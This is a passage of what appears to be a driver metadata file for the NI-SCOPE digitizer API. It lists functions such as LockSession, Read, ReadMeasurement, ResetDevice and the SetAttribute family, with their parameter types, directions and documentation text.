'description': '\n**resourceName** specifies the resource name of the device to\ninitialize.\n\nresourceName Examples\n\nFor Traditional NI-DAQ devices, the syntax is DAQ::\\ *n*, where *n* is\nthe device number assigned by MAX, as shown in Example 1.\n\nFor NI-DAQmx devices, the syntax is just the device name specified in\nMAX, as shown in Example 2. Typical default names for NI-DAQmx devices\nin MAX are Dev1 or PXI1Slot1. You can rename an NI-DAQmx device by\nright-clicking on the name in MAX and entering a new name.\n\nAn alternate syntax for NI-DAQmx devices consists of DAQ::\\ *NI-DAQmx\ndevice name*, as shown in Example 3. This naming convention allows for\nthe use of an NI-DAQmx device in an application that was originally\ndesigned for a Traditional NI-DAQ device. For example, if the\napplication expects DAQ::1, you can rename the NI-DAQmx device to 1 in\nMAX and pass in DAQ::1 for the resource name, as shown in Example 4.\n\nIf you use the DAQ::\\ *n* syntax and an NI-DAQmx device name already\nexists with that same name, the NI-DAQmx device is matched first.\n\nYou can also pass in the name of an IVI logical name or an IVI virtual\nname configured with the IVI Configuration utility, as shown in Example\n5. A logical name identifies a particular virtual instrument. A virtual\nname identifies a specific device and specifies the initial settings for\nthe session.\n',
'table_body': [
[
'1',
'Traditional NI-DAQ device',
'DAQ::\\ *1*',
'(*1* = device number)'
],
[
'2',
'NI-DAQmx device',
'*myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'3',
'NI-DAQmx device',
'DAQ::\\ *myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'4',
'NI-DAQmx device',
'DAQ::\\ *2*',
'(*2* = device name)'
]
],
'table_header': [
'Example #',
'Device Type',
'Syntax',
'Variable'
]
},
'name': 'resourceName',
'type': 'ViRsrc'
},
{
'direction': 'in',
'documentation': {
'description': '\nUse only "" or a null pointer. If you specify a channel, NI-SCOPE will\nreturn an error.\n'
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns True if the device is ready to use, or False if the device is\nstill initializing.\n'
},
'name': 'deviceReady',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'IsInvalidWfmElement': {
'codegen_method': 'no',
'documentation': {
'description': '\nDetermines whether a value you pass from the waveform array is invalid.\nAfter the read and fetch waveform functions execute, each element in the\nwaveform array contains either a voltage or a value indicating that the\ninstrument could not sample a voltage.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass one of the values from the waveform array returned by the read and\nfetch waveform functions.\n'
},
'name': 'elementValue',
'type': 'ViReal64'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns whether the element value is a valid voltage or a value\nindicating that the digitizer could not sample a voltage.\n\nReturn values:\n\n| VI_TRUE—The element value indicates that the instrument could not\n sample the voltage.\n| VI_FALSE—The element value is a valid voltage.\n'
},
'name': 'isInvalid',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'LockSession': {
'documentation': {
'description': '\nObtains a multithread lock on the instrument session. Before doing so,\nit waits until all other execution threads have released their locks on\nthe instrument session. Other threads might have obtained a lock on this\nsession in the following ways:\n\n- Your application called niScope_LockSession\n- A call to the instrument driver locked the session\n- A call to the IVI engine locked the session\n\nAfter your call to niScope_LockSession returns successfully, no other\nthreads can access the instrument session until you call\nniScope_UnlockSession. Use niScope_LockSession and\nniScope_UnlockSession around a sequence of calls to instrument driver\nfunctions if you require that the instrument retain its settings through\nthe end of the sequence.\n\nYou can safely make nested calls to niScope_LockSession within the same\nthread. To completely unlock the session, you must balance each call to\nniScope_LockSession with a call to niScope_UnlockSession. If, however,\nyou use the **callerHasLock** in all calls to niScope_LockSession and\nniScope_UnlockSession within a function, the IVI Library locks the\nsession only once within the function regardless of the number of calls\nyou make to niScope_LockSession. This allows you to call\nniScope_UnlockSession just once at the end of the function.\n'
},
'method_templates': [
{
'documentation_filename': 'lock',
'method_python_name_suffix': '',
'session_filename': 'lock'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nThis parameter serves as a convenience. If you do not want to use this\nparameter, pass VI_NULL.\n\nUse this parameter in complex functions to keep track of whether you\nhave obtained a lock and therefore need to unlock the session. Pass the\naddress of a local ViBoolean variable. In the declaration of the local\nvariable, initialize it to VI_FALSE. Pass the address of the same local\nvariable to any other calls you make to niScope_LockSession or\nniScope_UnlockSession in the same function.\n'
},
'name': 'callerHasLock',
'type': 'ViBoolean'
}
],
'python_name': 'lock',
'render_in_session_base': True,
'returns': 'ViStatus',
'use_session_lock': False
},
'ProbeCompensationSignalStart': {
'documentation': {
'description': 'Starts the 1 kHz square wave output on PFI 1 for probe compensation.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ProbeCompensationSignalStop': {
'documentation': {
'description': 'Stops the 1 kHz square wave output on PFI 1 for probe compensation.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'Read': {
'codegen_method': 'private',
'documentation': {
'description': '\nInitiates an acquisition, waits for it to complete, and retrieves the\ndata. The process is similar to calling niScope_InitiateAcquisition,\nniScope_AcquisitionStatus, and niScope_Fetch. The only difference is\nthat with niScope_Read, you enable all channels specified with\n**channelList** before the acquisition; in the other method, you enable\nthe channels with niScope_ConfigureVertical.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.\n',
'note': '\nSome functionality is not supported in all digitizers. Refer to\n`Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'read',
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'ReadMeasurement': {
'codegen_method': 'private',
'documentation': {
'description': '\nInitiates an acquisition, waits for it to complete, and performs the\nspecified waveform measurement for a single channel and record or for\nmultiple channels and records.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information.\n\nMany of the measurements use the low, mid, and high reference levels.\nYou configure the low, mid, and high references by using\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL to set each channel\ndifferently.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nto be performed\n'
},
'enum': 'ScalarMeasurement',
'name': 'scalarMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nContains an array of all measurements acquired. Call\nniScope_ActualNumWfms to determine the array length.\n'
},
'name': 'result',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]',
'use_array': True
}
],
'returns': 'ViStatus'
},
'ReadWaveform': {
'codegen_method': 'no',
'documentation': {
'description': '\nInitiates an acquisition on the channels that you enable with\nniScope_ConfigureVertical. This function then waits for the acquisition\nto complete and returns the waveform for the channel you specify. Call\nniScope_FetchWaveform to obtain the waveforms for each of the remaining\nenabled channels without initiating another acquisition.\n\nUse niScope_ActualRecordLength to determine the required size for the\n**waveform** array.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of elements to insert into the **waveform** array.'
},
'name': 'waveformSize',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the maximum length of time in which to allow the read waveform\noperation to complete.\n\nIf the operation does not complete within this time interval, the\nfunction returns the NISCOPE_ERROR_MAX_TIME_EXCEEDED error code.\nWhen this occurs, you can call niScope_Abort to cancel the read\nwaveform operation and return the digitizer to the idle state.\n\nUnits: milliseconds\n\n| Other Defined Values\n| NISCOPE_VAL_MAX_TIME_NONE\n| NISCOPE_VAL_MAX_TIME_INFINITE\n'
},
'name': 'maxTime',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the waveform that the digitizer acquires.\nUnits: volts\n'
},
'name': 'waveform',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the actual number of points the function placed in the\n**waveform** array.\n'
},
'name': 'actualPoints',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the time of the first point in the **waveform** array relative\nto the Reference Position.\n\nUnits: seconds\n\nFor example, if the digitizer acquires the first point in the\n**waveform** array 1 second before the trigger, this parameter returns\nthe value –1.0. If the acquisition of the first point occurs at the same\ntime as the trigger, this parameter returns the value 0.0.\n'
},
'name': 'initialX',
'type': 'ViReal64'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the length of time between points in the **waveform** array.\n\nUnits: seconds\n'
},
'name': 'xIncrement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ReadWaveformMeasurement': {
'codegen_method': 'no',
'documentation': {
'description': '\nInitiates a new waveform acquisition and returns a specified waveform\nmeasurement from a specific channel.\n\nThis function initiates an acquisition on the channels that you enable\nwith the niScope_ConfigureVertical function. It then waits for the\nacquisition to complete, obtains a waveform measurement on the channel\nyou specify, and returns the measurement value. You specify a particular\nmeasurement type, such as rise time, frequency, or voltage peak-to-peak.\n\nYou can call the niScope_FetchWaveformMeasurement function separately\nto obtain any other waveform measurement on a specific channel without\ninitiating another acquisition.\n\nYou must configure the appropriate reference levels before calling this\nfunction. Configure the low, mid, and high references by calling\nniScope_ConfigureRefLevels or by setting the following attributes:\n\n| NISCOPE_ATTR_MEAS_HIGH_REF\n| NISCOPE_ATTR_MEAS_LOW_REF\n| NISCOPE_ATTR_MEAS_MID_REF\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'The scalar measurement to perform.'
},
'name': 'measFunction',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the maximum length of time in which to allow the read waveform\noperation to complete.\n\nIf the operation does not complete within this time interval, the\nfunction returns the NISCOPE_ERROR_MAX_TIME_EXCEEDED error code.\nWhen this occurs, you can call niScope_Abort to cancel the read\nwaveform operation and return the digitizer to the idle state.\n\nUnits: milliseconds\n'
},
'name': 'maxTime',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': 'The measured value.'
},
'name': 'measurement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ResetAllAttributes': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ResetAttribute': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'name': 'attributeId',
'type': 'ViAttr'
}
],
'returns': 'ViStatus'
},
'ResetDevice': {
'documentation': {
'description': '\nPerforms a hard reset of the device. Acquisition stops, all routes are\nreleased, RTSI and PFI lines are tristated, hardware is configured to\nits default state, and all session attributes are reset to their default\nstate.\n\n- `Thermal Shutdown <digitizers.chm::/Thermal_Shutdown.html>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ResetInterchangeCheck': {
'codegen_method': 'no',
'documentation': {
'description': '\nWhen developing a complex test system that consists of multiple test\nmodules, it is generally a good idea to design the test modules so that\nthey can run in any order. To do so requires ensuring that each test\nmodule completely configures the state of each instrument it uses.\n\n| If a particular test module does not completely configure the state of\n an instrument, the state of the instrument depends on the\n configuration from a previously executed test module.\n| If you execute the test modules in a different order, the behavior of\n the instrument and therefore the entire test module is likely to\n change.\n\n| This change in behavior is generally instrument-specific and\n represents an interchangeability problem. You can use this function to\n test for such cases. After you call this function, the\n interchangeability checking algorithms in the specific driver ignore\n all previous configuration operations.\n| By calling this function at the beginning of a test module, you can\n determine whether the test module has dependencies on the operation of\n previously executed test modules.\n\nThis function does not clear the interchangeability warnings from the\nlist of previously recorded interchangeability warnings. If you want to\nguarantee that niScope_GetNextInterchangeWarning only returns those\ninterchangeability warnings that are generated after calling this\nfunction, you must clear the list of interchangeability warnings.\n\nYou can clear the interchangeability warnings list by repeatedly calling\nniScope_GetNextInterchangeWarning until no more interchangeability\nwarnings are returned. If you are not interested in the content of those\nwarnings, you can call niScope_ClearInterchangeWarnings.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ResetWithDefaults': {
'documentation': {
'description': '\nPerforms a software reset of the device, returning it to the default\nstate and applying any initial default settings from the IVI\nConfiguration Store.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'SampleMode': {
'codegen_method': 'no',
'documentation': {
'description': 'Returns the sample mode the digitizer is currently using.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the sample mode the digitizer is currently using; NI-SCOPE\nreturns the value of the NISCOPE_ATTR_SAMPLE_MODE attribute.\n'
},
'name': 'sampleMode',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'SampleRate': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the effective sample rate, in samples per second, of the\nacquired waveform using the current configuration. Refer to `Coercions\nof Horizontal\nParameters <REPLACE_DRIVER_SPECIFIC_URL_1(horizontal_parameters)>`__ for\nmore information about sample rate coercion.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the effective sample rate of the acquired waveform the digitizer\nacquires for each channel; the driver returns the value held in the\nNISCOPE_ATTR_HORZ_SAMPLE_RATE attribute.\n'
},
'name': 'sampleRate',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'SendSoftwareTriggerEdge': {
'documentation': {
'description': '\nSends the selected trigger to the digitizer. Call this function if you\ncalled niScope_ConfigureTriggerSoftware when you want the Reference\ntrigger to occur. You can also call this function to override a misused\nedge, digital, or hysteresis trigger. If you have configured\nNISCOPE_ATTR_ACQ_ARM_SOURCE, NISCOPE_ATTR_ARM_REF_TRIG_SRC, or\nNISCOPE_ATTR_ADV_TRIG_SRC, call this function when you want to send\nthe corresponding trigger to the digitizer.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the type of trigger to send to the digitizer.\n\n**Defined Values**\n\n| NISCOPE_VAL_SOFTWARE_TRIGGER_START (0L)\n| NISCOPE_VAL_SOFTWARE_TRIGGER_ARM_REFERENCE (1L)\n| NISCOPE_VAL_SOFTWARE_TRIGGER_REFERENCE (2L)\n| NISCOPE_VAL_SOFTWARE_TRIGGER_ADVANCE (3L)\n'
},
'enum': 'WhichTrigger',
'name': 'whichTrigger',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'SendSwTrigger': {
'codegen_method': 'no',
'documentation': {
'description': '\nSends a command to trigger the digitizer. Call this function after you\ncall niScope_ConfigureTriggerSoftware.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification. Consider using niScope_SendSoftwareTriggerEdge instead.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'SetAttributeViBoolean': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViBoolean attribute. This is a low-level function\nthat you can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the SetAttribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'SetAttributeViInt32': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViInt32 attribute. This is a low-level function that\nyou can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level functions as much as possible because\nthey handle order dependencies and multithread locking for you. In\naddition, high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute. Some values might not be\nvalid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'SetAttributeViInt64': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViInt64 attribute. This is a low-level function that\nyou can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level functions as much as possible because\nthey handle order dependencies and multithread locking for you. In\naddition, high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute. Some values might not be\nvalid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViInt64'
}
],
'returns': 'ViStatus'
},
'SetAttributeViReal64': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViReal64 attribute. This is a low-level function\nthat you can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'SetAttributeViSession': {
'codegen_method': 'no',
'documentation': {
'description': '\nSets the value of a ViSession attribute. This is a low-level function\nthat you can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'SetAttributeViString': {
'codegen_method': 'private',
'documentation': {
